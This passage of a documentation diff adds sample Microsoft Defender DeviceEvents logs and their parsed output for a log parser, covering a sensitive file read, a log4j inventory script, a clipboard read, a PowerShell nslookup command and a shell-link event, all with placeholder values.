_get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, 
\"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", - "event": { - "category": [ - "host" - ], - "dataset": "device_events", - "type": [ - "info" - ] - }, - "@timestamp": "2024-10-22T15:09:08.851712Z", - "action": { - "properties": { - "InitiatingProcessLogonId": "0" - }, - "type": "ScriptContent" - }, - "file": { - "hash": { - "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" - } - }, - "host": { - "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", - "name": "computer.intranet.example" - }, - "microsoft": { - "defender": { - "report": { - "id": "65306" - } - } - }, - "process": { - "parent": { - "pid": 0 - }, - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" - }, - "related": { - "hash": [ - "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" - ] - } - } - - ``` - - === "test_detection_source.json" ```json 
@@ -960,6 +965,407 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_device_event_sensitive_file_read.json" + + ```json + + { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + 
"info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "InitiatingProcessCommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "InitiatingProcessFileSize": 3316224, + "InitiatingProcessLogonId": "5223047", + "InitiatingProcessVersionInfoCompanyName": "Test Corporation", + "InitiatingProcessVersionInfoFileDescription": "Browser EXE", + "InitiatingProcessVersionInfoInternalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoOriginalFileName": "Browser.EXE", + "InitiatingProcessVersionInfoProductName": "Test Product", + "InitiatingProcessVersionInfoProductVersion": "1, 0, 0, 1" + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "parent": { + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "related": { + "hash": [ + 
"44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } + + ``` + + +=== "test_device_events_2.json" + + ```json + + { + "message": "{\"time\": \"2024-10-22T15:10:29.9681180Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:20.5220737Z\", \"properties\": {\"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 65306, \"InitiatingProcessId\": 417271, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:08.62407Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path 
\\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def 
_get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, 
\"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-22T15:09:08.851712Z", + "action": { + "properties": { + "InitiatingProcessLogonId": "0" + }, + "type": "ScriptContent" + }, + "file": { + "hash": { + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + } + }, + "host": { + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" + }, + "microsoft": { + "defender": { + "report": { + "id": "65306" + } + } + }, + "process": { + "parent": { + "pid": 0 + }, + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" + }, + "related": { + "hash": [ + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + ] + } + } + + ``` + + +=== "test_device_events_get_clipboard_data.json" + + ```json + + { + "message": 
"{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":4415
2968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "InitiatingProcessCommandLine": "\"OUTLOOK.EXE\" ", + "InitiatingProcessFileSize": 44152968, + "InitiatingProcessLogonId": "389220681", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Microsoft Outlook", + "InitiatingProcessVersionInfoInternalFileName": "Outlook", + "InitiatingProcessVersionInfoOriginalFileName": "Outlook.exe", + "InitiatingProcessVersionInfoProductName": "Microsoft Outlook", + "InitiatingProcessVersionInfoProductVersion": "16.0.17928.20216" + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + 
"sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } + + ``` + + +=== "test_device_events_powershell_command.json" + + ```json + + { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe 
user01-domain.USER01.local 1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "InitiatingProcessAccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + 
"InitiatingProcessCommandLine": "powershell.exe", + "InitiatingProcessFileSize": 450560, + "InitiatingProcessLogonId": "398124703", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows PowerShell", + "InitiatingProcessVersionInfoInternalFileName": "POWERSHELL", + "InitiatingProcessVersionInfoOriginalFileName": "PowerShell.EXE", + "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "InitiatingProcessVersionInfoProductVersion": "10.0.22621.3085" + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } + + ``` + + +=== "test_device_events_shell_link_create_file.json" + + ```json + + { + "message": 
"{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 